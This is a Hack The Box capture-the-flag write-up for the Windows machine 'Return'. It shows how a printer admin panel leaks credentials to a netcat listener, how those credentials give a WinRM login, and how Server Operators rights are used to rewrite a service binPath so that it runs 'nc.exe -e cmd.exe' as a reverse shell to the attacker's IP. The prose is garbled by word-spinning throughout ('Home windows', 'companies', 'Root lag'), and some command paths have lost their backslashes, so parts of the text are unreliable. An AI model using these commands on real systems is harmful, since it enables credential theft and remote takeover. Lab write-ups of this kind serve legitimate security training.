Return is a Home windows machine on HTB and is rated as straightforward, this field is designed over home windows which have Weak Service Permission. If summarized, we’ll abuse a printer admin portal to get hardcoded credentials by way of netcat and use them for WinRM login. The printer service account is a member of the Server Operators group which permits one to cease and begin some companies. Thus, we exploited weak configured companies to execute our malicious exe file by abusing the Server Operators’ permission.
Desk of content material
Preliminary Entry
- Enumeration
- Credential Dumping
- WinRM Legitimate Account
- Person Flag
Privilege Escalation
- Abusing weak service permission
- Root lag
Let’s deep dive into this.
Preliminary Entry
First, we do a Nmap scan of the machine’s IP tackle to search out the open ports and noticed some ports are open, from Microsoft Companies we understood its Home windows Working System.
nmap -sV -sC 10.129.31.219
Enumeration
Since port 80 is open, let’s attempt to entry the IP tackle by way of a browser.
As you may see, we now have entry to a printer admin panel. The pages are working PHP. Let’s navigate to the setting tab.
The above setting reveals us the username which is svc-printer and the hardcoded password which has been masked. The server tackle discipline is the one discipline that works as a parameter then the replace button is pressed. So the printer is speaking with the native tackle on port 389.
What if we change the server tackle with the attacking machine IP tackle utilizing port 389?
Credential Dumping
As soon as we now have changed the server tackle from the attacker’s IP (Kali Linux), we launched Netcat listener on port 389 on our kali machine.
nc -lvp 389
As soon as we hit the replace button, we obtained the password “1edFg43012!!”
WinRM Legitimate Account
Let’s use evil-winrm to ascertain a distant connection. This may be finished by issuing the command beneath:
evil-winrm -i 10.129.31.219 -u svc-printer -p "1edFg43012!!"
We’ve got entry to the server. Let’s browser to the desktop listing and see if we will discover any flags. Certainly, as proven within the above screenshot, we will discover the person.txt flag.
Privilege Escalation
Now that we now have entry to the machine, let’s confirm which person permission or group we now have.
To confirm this, we subject the command internet person svc-printer
From the screenshot beneath, we will see that the precise person is a member of the server operators group.
What can a person with a Server Operators group membership do?
The server operators can begin and cease companies.
The server Operator group is taken into account a service administrator and might change binaries which can be put in on the area controller, learn extra from right here.
add /usr/share/windows-binaries/nc.exe
Thus, we first uploaded the nc.exe home windows binaries file after which enumerate for put in companies for additional exploitation.
companies
we discovered a listing of put in companies and their path together with true/false flags for privileges.
Abusing Weak Service Permission
Right here we have to analyse which binary path we will modify to execute nc.exe file
First, we strive home windows defender to alter the binary path for WinDefend however acquired an entry denied error.
sc.exe config WinDefend binPath="C:Userssvc-printerDesktopnc.exe -e cmd.exe 10.10.14.93 1234"
Then we attempt to modify the binary path for VMTools and eventually this labored for us.
sc.exe config VMTools binPath="C:Userssvc-printerDesktopnc.exe -e cmd.exe 10.10.14.93 1234"
Since SVC-printer is a member of the server operator thus we will restart the service to get the reverse connection. So, let’s cease and begin the service VMTools by issuing the command:
sc.exe cease VMTools sc.exe begin VMTools
Earlier than beginning the service VMTools, we be sure that the netcat is listening on port 1234 as proven beneath.
As soon as the service is stopped and will get began, we acquired netcat session as receive Root flag.
Writer: Tirut Hawoldar is a Cyber Safety Fanatic and CTF participant with 15 years of expertise in IT Safety and Infrastructure. May be Contacted on LinkedIn